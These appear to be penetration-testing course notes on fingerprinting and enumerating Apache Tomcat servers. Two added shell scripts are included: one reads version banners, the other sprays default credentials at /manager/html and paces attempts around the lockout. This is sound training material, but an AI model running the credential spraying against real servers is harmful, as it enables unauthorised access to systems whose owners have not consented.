
Discovery & Enum

  • Apache Tomcat is an open-source web server that hosts applications written in Java
  • originally designed to run Java Servlets and Java Server Pages (JSP); it became far more common with the rise of Java frameworks such as Spring (Gradle is a build tool used to package such apps, not something Tomcat runs)
  • Tomcat is less often exposed directly to the internet, though we still see it from time to time on external pentests, where it can make for an excellent foothold into the internal network. It is far more common to find Tomcat (often multiple instances) during internal pentests.

Discovery

  • EyeWitness often flags it by its default pages when screenshotting discovered web services.
  • If we see Tomcat, it could be an easy foothold into the internal network.
  • Request a page that does not exist: the default Tomcat error page names the version in its footer (e.g. "Apache Tomcat/9.0.30"), unless the admin disabled that on the ErrorReportValve.
  • If that doesn't work, try the /docs/ page (the default documentation webapp states the version in its title):
    • curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat
  • Default layout of a Tomcat installation:
    • The bin folder stores scripts and binaries needed to start and run a Tomcat server.
    • The conf folder stores various configuration files used by Tomcat.
    • The conf/tomcat-users.xml file stores user credentials and their assigned roles (e.g. manager-gui).
    • The lib folder holds the various JAR files needed for the correct functioning of Tomcat.
    • The logs folder holds Tomcat's log files; temp holds temporary files created at runtime.
    • The webapps folder is the default webroot of Tomcat and hosts all the deployed applications.
    • The work folder acts as a cache and stores runtime data such as compiled JSPs.
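The two version checks above (bogus path for the default error page, then /docs/), as an added shell example that is not part of the original notes. The response bodies embedded here are constructed to mirror the shape Tomcat emits, not captured from a host; the hostname in the usage line is the one used in the notes.

```shell
#!/bin/sh
# Added example: pull the Tomcat version out of the two places the notes mention,
# the default error page (any bogus path) and the /docs/ index page.

# Constructed sample bodies (not captured from a real host) in the shape Tomcat emits:
# the ErrorReportValve footer "<h3>Apache Tomcat/x.y.z</h3>" and the /docs/ index title.
SAMPLE_404='<!doctype html><html><head><title>HTTP Status 404 - Not Found</title></head><body><h1>HTTP Status 404 - Not Found</h1><hr class="line" /><h3>Apache Tomcat/9.0.30</h3></body></html>'
SAMPLE_DOCS='<html><head><title>Apache Tomcat 8 (8.5.50) - Documentation Index</title></head><body><h1><a href="https://tomcat.apache.org/">Apache Tomcat 8</a></h1></body></html>'

# Print the dotted version found in a response body, or nothing if there is none.
# Handles both "Apache Tomcat/9.0.30" (error pages) and "Apache Tomcat 8 (8.5.50)" (/docs/).
tomcat_version_from_body() {
    printf '%s' "$1" \
        | grep -o -E 'Apache Tomcat(/| [0-9]+ \()[0-9]+(\.[0-9]+)+' \
        | grep -o -E '[0-9]+(\.[0-9]+)+' \
        | head -n 1
}

# Live probe against a base URL such as http://app-dev.inlanefreight.local:8080.
fingerprint_tomcat() {
    base="${1%/}"
    # A path that cannot exist forces the default error page, which carries the version
    # unless the admin set showServerInfo="false" on the ErrorReportValve.
    v="$(tomcat_version_from_body "$(curl -s -m 10 "$base/this-page-does-not-exist-$$")")"
    # Fall back to the docs webapp: deployed by default, but often removed on hardened hosts.
    [ -n "$v" ] || v="$(tomcat_version_from_body "$(curl -s -m 10 "$base/docs/")")"
    if [ -n "$v" ]; then
        printf 'Tomcat %s at %s\n' "$v" "$base"
    else
        printf 'no Tomcat version banner at %s\n' "$base" >&2
        return 1
    fi
}

# Usage: sh tomcat_version.sh http://app-dev.inlanefreight.local:8080
if [ $# -gt 0 ]; then
    fingerprint_tomcat "$1"
fi
```

No banner from either check does not rule Tomcat out; it usually means the error page was customised and /docs/ was removed, so fall back to the /manager paths and path enumeration below.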

  • Inside each deployed application under webapps/, the most important file is WEB-INF/web.xml, known as the deployment descriptor.
    • stores the routes (URL patterns) used by the application and the servlet classes handling these routes
    • Tomcat never serves WEB-INF/ directly (requests for /WEB-INF/... return 404), so reading it requires a path traversal, LFI, or file-system access
  • Compiled classes used by the application live in the WEB-INF/classes folder (or packaged as JARs in WEB-INF/lib).
    • These classes might contain important business logic as well as sensitive information such as hardcoded credentials.
    • Any vulnerability in these files can lead to total compromise of the website.
  • WEB-INF/lib stores the JAR libraries needed by that particular application.
  • The jsp folder stores Jakarta Server Pages (JSP), formerly known as JavaServer Pages, which can be compared to PHP files on an Apache server; Tomcat compiles them to servlets on first request.

Enum

  • After finding out the exact version, check whether it has a known CVE.
  • Either way, look for the /manager/html and /host-manager/html pages
    • gobuster dir -u http://web01.inlanefreight.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
    • or browse directly
  • try weak credentials such as tomcat:tomcat, admin:admin, etc.
    • a 403 on /manager/html does not mean the creds are wrong: the manager app ships with a RemoteAddrValve that only allows localhost by default, and the account may simply lack the manager-gui role
    • the default LockOutRealm locks an account for 300 seconds after 5 failed logins, so keep guessing to a few pairs per username
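The credential check above with the status code read properly (403 and lockout are the two traps), as an added shell example that is not part of the original notes. The pairs come from the notes plus tomcat:s3cret, the sample account in Tomcat's own tomcat-users.xml documentation; the hostname in the usage line is the one used in the notes.

```shell
#!/bin/sh
# Added example: try the handful of default credentials the notes mention against
# /manager/html, and read the status code correctly before deciding anything.

# Map the status code of a Basic-auth attempt to what it actually tells us.
classify_manager_response() {
    case "$1" in
        200) echo valid ;;      # authenticated and holds the manager-gui role
        401) echo invalid ;;    # wrong creds, or the account is currently locked out
        403) echo forbidden ;;  # creds may be right: missing role, or RemoteAddrValve (manager is localhost-only by default)
        404) echo absent ;;     # manager webapp not deployed on this instance
        *)   echo "unknown($1)" ;;
    esac
}

# Default pairs to try: tomcat:tomcat and admin:admin from the notes, plus tomcat:s3cret,
# the sample account from Tomcat's own tomcat-users.xml documentation.
DEFAULT_PAIRS='tomcat:tomcat admin:admin tomcat:s3cret'

# The default LockOutRealm locks a username after 5 failures for 300 s, and a locked
# account answers 401 even to the right password, so: few attempts, stop at first hit.
spray_manager() {
    base="${1%/}"
    for pair in $DEFAULT_PAIRS; do
        code="$(curl -s -o /dev/null -m 10 -w '%{http_code}' -u "$pair" "$base/manager/html")"
        result="$(classify_manager_response "$code")"
        printf '%-16s %s %s\n' "$pair" "$code" "$result"
        case "$result" in
            valid)  return 0 ;;
            absent) return 2 ;;   # no point trying more passwords against a 404
        esac
    done
    return 1
}

# Usage: sh tomcat_manager_creds.sh http://web01.inlanefreight.local:8180
if [ $# -gt 0 ]; then
    spray_manager "$1"
fi
```

If every attempt comes back 403, stop guessing and note the host: the valve check happens before the role check, so the same credentials may work from a pivot on the box itself or via a proxy that sits on localhost.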